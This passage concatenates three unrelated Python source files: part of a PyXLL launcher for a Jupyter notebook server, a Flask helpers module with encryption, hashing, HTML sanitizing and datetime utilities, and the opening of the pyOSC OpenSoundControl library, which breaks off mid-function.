# patch user_global_ns so that it always references the user_ns dict
setattr(ipy.shell.__class__, 'user_global_ns', property(lambda self: self.user_ns))
# patch ipapp so anything else trying to get a terminal app (e.g. ipdb) gets our IPKernelApp.
from IPython.terminal.ipapp import TerminalIPythonApp
TerminalIPythonApp.instance = lambda: ipy
# Use the inline matplotlib backend
mpl = ipy.shell.find_magic("matplotlib")
if mpl:
try:
mpl("inline")
except ImportError:
pass
return ipy
def launch_jupyter(connection_file, cwd=None, timeout=30):
"""Launch a Jupyter notebook server as a child process.
:param connection_file: File for kernels to use to connect to an existing kernel.
:param cwd: Current working directory to start the notebook in.
:param timeout: Timeout in seconds to wait for the Jupyter process to start.
:return: (Popen instance, URL string)
"""
# Find jupyter-notebook.exe in the Scripts path local to python.exe
jupyter_notebook = None
if sys.executable and os.path.basename(sys.executable) in ("python.exe", "pythonw.exe"):
for path in (os.path.dirname(sys.executable), os.path.join(os.path.dirname(sys.executable), "Scripts")):
jupyter_notebook = os.path.join(path, "jupyter-notebook.exe")
if os.path.exists(jupyter_notebook):
break
# If it wasn't found look for it on the system path
if jupyter_notebook is None or not os.path.exists(jupyter_notebook):
jupyter_notebook = _which("jupyter-notebook.exe")
if jupyter_notebook is None or not os.path.exists(jupyter_notebook):
raise Exception("jupyter-notebook.exe not found")
# Use the current python path when launching
env = dict(os.environ)
env["PYTHONPATH"] = ";".join(sys.path)
# Set PYXLL_IPYTHON_CONNECTION_FILE so the manager knows what to connect to
env["PYXLL_IPYTHON_CONNECTION_FILE"] = connection_file
# run jupyter in its own process
cmd = [
jupyter_notebook,
"--NotebookApp.kernel_manager_class=pyxll_jupyter.extipy.ExternalIPythonKernelManager",
"--no-browser",
"-y"
]
proc = subprocess.Popen(cmd, cwd=cwd, env=env, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
if proc.poll() is not None:
raise Exception("Command '%s' failed to start" % " ".join(cmd))
# Add it to the list of processes to be killed when Excel exits
_all_jupyter_processes.append(proc)
# Monitor the output of the process in a background thread
def thread_func(proc, url_queue, killed_event):
encoding = sys.getfilesystemencoding()
matched_url = None
while proc.poll() is None:
line = proc.stdout.readline().decode(encoding, "replace").strip()
if line.startswith("DEBUG"):
_log.debug(line)
continue
_log.info(line)
if matched_url is None:
match = re.search(r"(https?://([a-z|0-9]+\.?)+(:[0-9]+)?/?\?token=[a-f|0-9]+)", line, re.I | re.A)
if match:
matched_url = match.group(1)
_log.info("Found Jupyter notebook server running on '%s'" % matched_url)
url_queue.put(matched_url)
if matched_url is None and not killed_event.is_set():
_log.error("Jupyter notebook process ended without printing a URL.")
url_queue.put(None)
url_queue = queue.Queue()
killed_event = threading.Event()
thread = threading.Thread(target=thread_func, args=(proc, url_queue, killed_event))
thread.daemon = True
thread.start()
# Wait for the URL to be logged
try:
url = url_queue.get(timeout=timeout)
except queue.Empty:
_log.error("Timed-out waiting for the Jupyter notebook URL.")
url = None
if url is None:
if proc.poll() is None:
_log.debug("Killing Jupyter notebook process...")
killed_event.set()
_kill_process(proc)
_all_jupyter_processes.remove(proc)
if thread.is_alive():
_log.debug("Waiting for background thread to complete...")
thread.join(timeout=1)
if thread.is_alive():
_log.warning("Timed out waiting for background thread.")
raise RuntimeError("Timed-out waiting for the Jupyter notebook URL.")
# Return the proc and url
return proc, url
def _kill_process(proc):
"""Kill a process using 'taskkill /F /T'."""
if proc.poll() is not None:
return
si = subprocess.STARTUPINFO(wShowWindow=subprocess.SW_HIDE)
retcode = subprocess.call(['taskkill', '/F', '/T', '/PID', str(proc.pid)],
startupinfo=si,
shell=True)
if proc.poll() is None:
_log.warning("Failed to kill Jupyter process %d: %s" % (proc.pid, retcode))
@atexit.register
def _kill_jupyter_processes():
"""Ensure all Jupyter processes are killed."""
global _all_jupyter_processes
for proc in _all_jupyter_processes:
_kill_process(proc)
_all_jupyter_processes = [x for x in _all_jupyter_processes if x.poll() is None]
|
helpers.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ------- IMPORT DEPENDENCIES -------
from datetime import *
from dateutil import *
from dateutil import tz
import time
import json
from jinja2 import Environment
import bleach
import jinja2
# security
import os
import binascii
from cryptography.fernet import Fernet
from werkzeug.security import generate_password_hash, check_password_hash
import base64
# ------- IMPORT LOCAL DEPENDENCIES -------
from threading import Thread
from functools import wraps
from flask import request, redirect, current_app
from . import app
# ------- TEST IF REQUEST ASK JSON -------
def request_wants_json():
if request.headers['Accept']:
if 'application/json' in request.headers['Accept']:
return True
return False
# ------- TO JSON -------
def to_json(func):
def wrapper(*args, **kwargs):
get_fun = func(*args, **kwargs)
return json.dumps(get_fun)
return wrapper
# ------- DECORATORS -------
def threaded_async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
def ssl_required(fn):
@wraps(fn)
def decorated_controller(*args, **kwargs):
if current_app.config.get("SSL"):
if request.is_secure:
return fn(*args, **kwargs)
else:
return redirect(request.url.replace("http://", "https://"))
return fn(*args, **kwargs)
return decorated_controller
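# Usage sketch for the decorators above (the route name and view body are
# illustrative, not taken from this project):
#
#     @app.route('/account')
#     @ssl_required
#     def account():
#         return "served over HTTPS when SSL is enabled"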
# ------- SECURITY TOOL : ENCODE, ENCRYPT, HASH, KEY GENERATOR -------
class SecurityTool(object):
"""
Security tool : secret key generator and encode, encrypt, hash tools
"""
__cipher_suite = Fernet(app.config['FERNET_SECRET_KEY'])
# def __init__(self):
# Fernet : symmetric encryption
# FERNET SECRET KEY for encryption : This must be kept secret. Keep this some place safe!
# If you lose it you’ll no longer be able to decrypt messages and anyone with this key is able to create and read messages.
# __cipher_suite = Fernet(app.config['FERNET_SECRET_KEY'])
# override to prevent peeking
# self.__dict__ = {}
# ------- ENCRYPTION WITH A KEY -------
def encrypt(self, plain_text):
# Fernet token : A secure message that cannot be read or altered without the key.
# It is URL-safe base64-encoded.
return self.__cipher_suite.encrypt(plain_text)
def decrypt(self, fernet_token):
return self.__cipher_suite.decrypt(fernet_token)
# ------- HASH STRING AND CHECK HASHED -------
def hash(self, password):
return generate_password_hash(password)
def check_hashed(self, hashed, input_password):
return check_password_hash(hashed, input_password)
# ------- BASE64 ENCODING AND DECODING -------
def encode(self, data):
return base64.b64encode(data)
def decode(self, encoded):
return base64.b64decode(encoded)
# ------- RANDOM TOKEN KEY GENERATOR -------
def generate_token_key(self):
# a secret key should be as random as possible.
token = binascii.hexlify(os.urandom(24))
return token
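# Minimal usage sketch (assumes app.config['FERNET_SECRET_KEY'] is configured;
# Fernet works on bytes, so encrypt/decrypt take and return bytes):
#
#     tool = SecurityTool()
#     token = tool.encrypt(b"secret message")
#     assert tool.decrypt(token) == b"secret message"
#     hashed = tool.hash("my-password")
#     assert tool.check_hashed(hashed, "my-password")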
# ------- RANDOM POPULATE DATABASE -------
def populate_db_with_random_data(db_model):
# ---- example here with a db model ----
# ---- it might take some time ----
from random import choice
from string import printable
import humanize
import os
start = time.time()
lis = list(printable)
for i in range(0, 50000):
for k,v in db_model():
short_value_list = ['title', 'name', 'password']
long_value_list = ['description']
if k in short_value_list:
k = ''.join(choice(lis) for _ in range(5))
if k in long_value_list:
k = ''.join(choice(lis) for _ in range(200))
db_model().add_data(k)
return "done in %.3f | database size: %s" % (time.time() - start, humanize.naturalsize(os.path.getsize("data/db.sqlite")))
# ------- HTML SANITIZER UTILS -------
ALLOWED_TAGS = bleach.sanitizer.ALLOWED_TAGS + [
'div', 'span', 'p', 'br', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'pre', 'code',
'dl', 'dt', 'dd', 'small', 'sup',
'img',
'input',
'table', 'tbody', 'thead', 'tr', 'th', 'td',
'section', 'header', 'footer', 'nav', 'article', 'aside', 'figure',
'dialog', 'hgroup', 'mark', 'time', 'meter', 'command', 'output',
'progress', 'audio', 'video', 'details', 'datagrid', 'datalist', 'table',
'address'
]
ALLOWED_ATTRIBUTES = bleach.sanitizer.ALLOWED_ATTRIBUTES
ALLOWED_ATTRIBUTES['div'] = ['class', 'id']
ALLOWED_ATTRIBUTES['span'] = ['style', ]
ALLOWED_ATTRIBUTES['img'] = ['src', 'id', 'align', 'alt', 'class', 'is', 'title', 'style', 'width', 'height']
ALLOWED_ATTRIBUTES['a'] = ['id', 'class', 'href', 'title', ]
ALLOWED_ATTRIBUTES.update(dict((x, ['style', ]) for x in ('h1', 'h2', 'h3', 'h4', 'h5', 'h6')))
ALLOWED_ATTRIBUTES.update(dict((x, ['id', ]) for x in (
'p', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'pre', 'code', 'dl', 'dt', 'dd',
'section', 'header', 'footer', 'nav', 'article', 'aside', 'figure',
'dialog', 'hgroup', 'mark', 'time', 'meter', 'command', 'output',
'progress', 'audio', 'video', 'details', 'datagrid', 'datalist', 'table',
'address'
)))
ALLOWED_STYLES = bleach.sanitizer.ALLOWED_STYLES + ['color', 'background-color']
def sanitize_html(text):
return bleach.clean(text, attributes=ALLOWED_ATTRIBUTES, tags=ALLOWED_TAGS, styles=ALLOWED_STYLES, strip_comments=False)
def parse_html(text):
return jinja2.Markup(text)
app.jinja_env.filters['parse_html'] = parse_html
app.jinja_env.filters['sanitize_html'] = sanitize_html
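# Example (hedged): with the allow-lists above, disallowed tags such as
# <script> are escaped by bleach.clean (they are only stripped if strip=True
# is passed), while allowed tags/attributes pass through unchanged:
#
#     sanitize_html('<p id="x">hi</p><script>alert(1)</script>')
#     # -> '<p id="x">hi</p>&lt;script&gt;alert(1)&lt;/script&gt;'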
# ------- DATETIME UTILS -------
def datetime_string_to_datetime_obj(datetime_string, strftime):
# Convert datetime string to datetime obj with his format described in strftime argument function
datetime_obj = datetime.strptime(datetime_string, strftime )
# print type(datetime_obj)
return datetime_obj
def datetime_obj_to_datetime_string(datetime_obj, strftime = '%Y-%m-%d %H:%M:%S'):
# Generate UTC datetime string
datetime_string = datetime_obj.strftime(strftime)
# print type(datetime_string)
return datetime_string
def datetime_local_to_datetime_utc(datetime_local):
# Hardcode utc zone
utc_zone = tz.gettz('UTC')
# or Auto-detect utc zone
# utc_zone = tz.tzutc()
# Convert local time to UTC
datetime_utc = datetime_local.astimezone(utc_zone)
# print type(datetime_utc)
return datetime_utc
def datetime_utc_to_datetime_local(datetime_utc, local_zone = None):
if local_zone is None :
# Hardcode local zone
# local_zone = tz.gettz('America/Chicago')
# or Auto-detect local zone
local_zone = tz.tzlocal()
# Mark the datetime as UTC first (datetime objects are 'naive' by default),
# then convert it to the local zone; replacing tzinfo with the local zone
# would only relabel the value without actually converting it.
datetime_local = datetime_utc.replace(tzinfo=tz.gettz('UTC')).astimezone(local_zone)
# print type(datetime_local)
return datetime_local
def string_timestamp_utc_to_string_datetime_utc(timestamp_utc, strftime = '%Y-%m-%d %H:%M:%S'):
# utcfromtimestamp() keeps the value in UTC; fromtimestamp() would shift it to server-local time
datetime_utc = datetime.utcfromtimestamp(timestamp_utc).strftime(strftime)
# print type(datetime_utc)
return datetime_utc
def string_datetime_utc_to_string_timestamp_utc(datetime_utc):
# timetuple() converts the datetime obj to a struct_time;
# calendar.timegm() interprets it as UTC (time.mktime would treat it as local time)
from calendar import timegm
timestamp_utc = timegm(datetime_utc.timetuple())
# print type(timestamp_utc)
return timestamp_utc
# Create Jinja new filter
def datetimeformat(date, format='%Y-%m-%d %H:%M:%S'):
return string_timestamp_utc_to_string_datetime_utc(date, format)
app.jinja_env.filters['datetimeformat'] = datetimeformat
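# --- Editor's illustrative sketch (not part of the original module) ---
# Round-trips a parsed local datetime through the UTC helpers above. It assumes
# the module-level imports already used in this file (datetime, dateutil's tz).
def _demo_datetime_utils():
    dt = datetime_string_to_datetime_obj("2016-01-01 12:00:00", "%Y-%m-%d %H:%M:%S")
    local_dt = dt.replace(tzinfo=tz.tzlocal())                  # make the naive value timezone-aware
    utc_dt = datetime_local_to_datetime_utc(local_dt)
    back_local = datetime_utc_to_datetime_local(utc_dt)
    return (datetime_obj_to_datetime_string(utc_dt),
            datetime_obj_to_datetime_string(back_local))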
|
OSC.py
|
#!/usr/bin/python
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy creation & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support for numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
from __future__ import print_function
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from SocketServer import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [float]
global IntTypes
IntTypes = [int]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print(msg)
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retrieving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address="", *args):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument.
The rest of the arguments are appended as data.
"""
self.clear(address)
if len(args)>0:
self.append(*args)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = ""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if type(argument) == dict:
argument = argument.items()
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__'):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(self.values()))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(self.values())
if type(values) == tuple:
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = self.values()
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in self.values())
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return self.values()[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = self.items()
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = values.items()
elif type(values) == list:
items = []
for val in values:
if type(val) == tuple:
items.append(val[:2])
else:
items.append((typehint, val))
elif type(values) == tuple:
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = self.items()
new_items = self._buildItemList(val)
if type(i) != slice:
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = self.items()
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return self.values().count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return self.values().index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = self.items() + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = self.items()
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = self.items()
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = self.items()
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = self.items()
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(v))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(self.values())
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(self.items())
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objects are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in self.values():
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsulated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if type(argument) == dict:
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
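# --- Editor's illustrative sketch (not part of the original pyOSC source) ---
# Shows how an OSCBundle wraps several messages and carries a timetag; it only
# uses the classes defined above and does not touch the network.
def _demo_bundle():
    bundle = OSCBundle("/demo")
    bundle.append(1)                                  # wrapped in an OSCMessage to '/demo'
    bundle.append({'addr': "/other", 'args': [2, 3.0]})
    bundle.setTimeTag(time.time() + 0.5)              # ask the receiver to hold it for 0.5 s
    return bundle.getBinary()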
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a multiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if type(next) in (str,):
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = ""
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
